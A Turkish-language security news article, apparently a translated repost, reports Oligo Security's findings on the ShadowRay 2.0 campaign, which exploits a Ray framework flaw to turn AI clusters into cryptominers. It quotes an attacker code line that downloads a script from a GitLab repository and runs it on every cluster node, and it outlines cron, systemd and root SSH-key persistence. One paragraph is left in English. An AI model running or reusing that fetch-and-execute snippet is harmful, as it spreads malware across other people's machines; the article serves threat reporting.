Yeni ShadowRay Saldırısı, Yapay Zeka Sistemlerine Saldırmak İçin Ray Yapay Zeka Çerçevesindeki Güvenlik Açıklarından Yararlanıyor


Yeni ShadowRay Saldırısı, Yapay Zeka Sistemlerine Saldırmak İçin Ray Yapay Zeka Çerçevesindeki Güvenlik Açıklarından Yararlanıyor

Siber güvenlik araştırmacıları, dağıtılmış bilgi işlem görevlerini yönetmek için yaygın olarak kullanılan açık kaynaklı bir yapay zeka çerçevesi olan Ray’deki bilinen bir kusurdan yararlanan aktif bir küresel bilgisayar korsanlığı kampanyasını ortaya çıkardı.

ShadowRay 2.0 olarak adlandırılan bu saldırı, güçlü AI bilgi işlem kümelerinin kontrolünü sessizce ele geçirmek ve bunları kripto para birimi madenciliği operasyonlarına dönüştürmek için CVE-2023-48022 güvenlik açığından yararlanıyor.

Saldırı, Mart 2024’teki ilk ShadowRay keşfinden bu yana önemli bir ilerlemeyi temsil ediyor; saldırganlar, tehlikeye atılmış altyapıdan maksimum değer elde ederken gizli kalmak için karmaşık taktikler kullanıyor.

Oligo Güvenlik araştırmacıları, saldırı kampanyasını Kasım 2025’in başlarında belirlediler ve IronErn440 adını kullanan tehdit aktörlerinin, Ray’in meşru düzenleme özelliklerini kendi kendine yayılan saldırılara yönelik araçlara dönüştürdüğünü keşfettiler.

Bu tehdidi özellikle endişe verici kılan şey, maruz kalmanın boyutudur. Dünya çapında açığa çıkan Ray sunucularının sayısı, ilk keşif sırasında binlerce iken bugün 230.000’in üzerine çıktı.

Birçoğu aktif girişimlere, araştırma laboratuvarlarına ve bulut barındırma sağlayıcılarına aittir ve geniş bir saldırı yüzeyi oluşturur.

google

Oligo Security güvenlik analistleri, GitLab aracılığıyla bölgeye duyarlı kötü amaçlı yazılımların dağıtıldığını gözlemledikten sonra saldırıyı belirledi.

Saldırganlar başlangıçta her kurbanın coğrafi konumuna uyarlanmış özelleştirilmiş yükler sunmak için DevOps platformunu kullandı.

GitLab’ın 5 Kasım 2025’te kötü amaçlı yazılım deposunu kaldırmasının ardından tehdit aktörleri operasyonlarını hızla GitHub’a taşıyarak olağanüstü bir operasyonel çeviklik sergilediler.

10 Kasım’a gelindiğinde yeni bir depo oluşturdular ve kampanyalarına daha da büyük bir titizlikle devam ettiler.

Yapay Zeka Saldırısı Yapay Zeka Altyapısı

Saldırı, saldırganların geleneksel gürültülü tarama olmadan savunmasız sunucuları belirlemesine olanak tanıyan bant dışı bir platform olan Interactive.sh kullanılarak yapılan keşifle başlayan, çok sayıda koordineli aşamadan oluşuyor.

Saldırganlar, Ray’in korumasız Jobs API’sini hedef alan sondalar göndererek savunmasız örneklerden geri çağrıları tetikler. Hedefler belirlendikten sonra, küme ayrıcalıklarıyla rastgele kod çalıştıran kötü amaçlı işler göndermek için kimliği doğrulanmamış Ray kontrol panelinden yararlanırlar.

Işın Kümesi (Kaynak - Oligo)
Işın Kümesi (Kaynak – Oligo)

En dikkate değer husus, yapay zeka tarafından oluşturulan yüklerin kullanılmasıdır. Saldırganlar, mevcut küme kaynaklarını otomatik olarak keşfeden, anında tespit edilmekten kaçınmak için CPU ve GPU tahsisinin yüzde 60’ını hesaplayan ve ardından meşru sistem süreçleri olarak gizlenen kripto para birimi madencilerini enjekte eden Python kodunu dağıtıyor.

Yükler, gelişmiş hata işleme ve kendi kendini uyarlama özelliği gösteriyor; bu da bunların, yük geliştirmeyi hızlandırmak için yapay zeka araçları kullanılarak oluşturulduğunu veya iyileştirildiğini gösteriyor.

Kritik bir kod pasajı, çok aşamalı enfeksiyon mekanizmasını gösterir. İlk erişim verisi, küme düğümlerini numaralandırmak ve her birine enfeksiyon komut dosyalarını dağıtmak için Ray’in NodeAffinitySchedulingStrategy’sini kullanır: –

düğümler =[n for n in ray.nodes() if n.get('Alive', False)]
cmd='wget -qO- https://gitlab.com/ironern440-group/ironern440-project/-/raw/main/aa_clean.sh && chmod +x aa_clean.sh && ./aa_clean.sh'
[ray.get(ray.remote(lambda:subprocess.run(cmd,shell=True)).options(scheduling_strategy=NodeAffinitySchedulingStrategy...

The attackers establish persistence through multiple mechanisms: cron jobs executing every fifteen minutes, systemd service hijacking, and SSH key injection into root accounts.

They mask malicious processes by renaming them to appear as legitimate kernel workers like [kworker/0:0] ve dns filtre hizmetleri, etkili bir şekilde göz önünde saklanıyor.

Madencilik Havuzu İstatistikleri (Kaynak – Oligo)

Bu kampanyayı farklı kılan, aktif rekabet dinamikleridir. Saldırganlar, rakip kripto para birimi madencilerini tespit etmek ve sonlandırmak için komut dosyaları dağıtır, ardından iptables kuralları ve ana dosya değişiklikleri yoluyla rakip madencilik havuzlarını engeller.

Hatta rakip tehdit aktörleri tarafından kullanılan belirli limanlardaki havuzları bile hedef alarak birden fazla suç grubunun aynı tehlikeye atılmış kaynaklar için savaştığı bir yeraltı ekosistemini ortaya çıkarıyorlar.

Altyapı adaptasyonu da aynı derecede endişe vericidir. Saldırganlar, Çin’deki kurbanlar için ağ kısıtlamalarını aşmak amacıyla proxy hizmetleri aracılığıyla bölgeye özgü veriler sağlıyor.

İp-api.com aracılığıyla coğrafi algılamayı kullanıyorlar ve Çin ve uluslararası hedefler için farklı komut dosyaları çalıştırıyorlar.

Saldırganlar, GitLab taahhütleri aracılığıyla yüklerini sürekli olarak günceller, altyapıyı kod olarak ele alır ve kurban makinelere yeniden konuşlandırmaya gerek kalmadan tekniklerinin gerçek zamanlı olarak geliştirilmesine olanak tanır.

Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.

googlehaberler



Source link